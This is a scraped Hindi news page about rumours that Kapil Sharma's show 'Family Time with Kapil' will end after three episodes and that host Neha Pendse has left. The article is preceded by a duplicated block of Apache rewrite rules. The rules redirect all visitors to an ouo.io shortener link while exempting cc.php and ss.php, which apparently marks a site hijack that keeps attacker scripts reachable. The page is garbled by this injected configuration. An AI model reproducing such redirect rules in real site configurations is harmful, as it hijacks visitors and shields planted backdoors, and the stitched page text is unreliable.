
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 776
Previous Nextमुंबई। सोनी टीवी पर कपिल शर्मा के शो 'फैमिली टाइम विद कपिल' को लेकर लगातार खबरें आ रही हैं। कहा जा रहा है कि शो तीन एपिसोड्स के बाद ही बंद कर दिया जाएगा। हालांकि चैनल के प्रवक्ता ने इस बात से इनकार किया है। इसी बीच एक नयी खबर यह आई है कि इस शो में होस्ट के तौर पर जुड़ी 'मे आई कम इन मैडम' की नेहा पेंडसे ने भी कपिल का साथ छोड़ दिया है। बताया जा रहा है कि नेहा पेंडसे ने दूसरे चैनल के शो 'पार्टनर्स' में एंट्री ले ली है। हालांकि इस बात से यह जाहिर नहीं है कि कपिल के शो का आगे वह हिस्सा रहेंगी कि नहीं और क्या कपिल के शो की शूटिंग आगे जारी रहेगी या नहीं। चूंकि कपिल के शो के साथ-साथ भी नेहा दूसरे शो की शूटिंग तो कर ही सकती हैं। बता दें कि कपिल के अब तक केवल तीन एपिसोड प्रसारित हुए हैं, इसके बाद कपिल ने नए एपिसोड के लिए शूटिंग ही नहीं की है। रिपोर्ट्स के मुताबिक वह चैनल से भी फिलहाल बातचीत नहीं कर रहे हैं। अब ऐसे में देखना यह है कि चैनल इस पर क्या निर्णय हैं।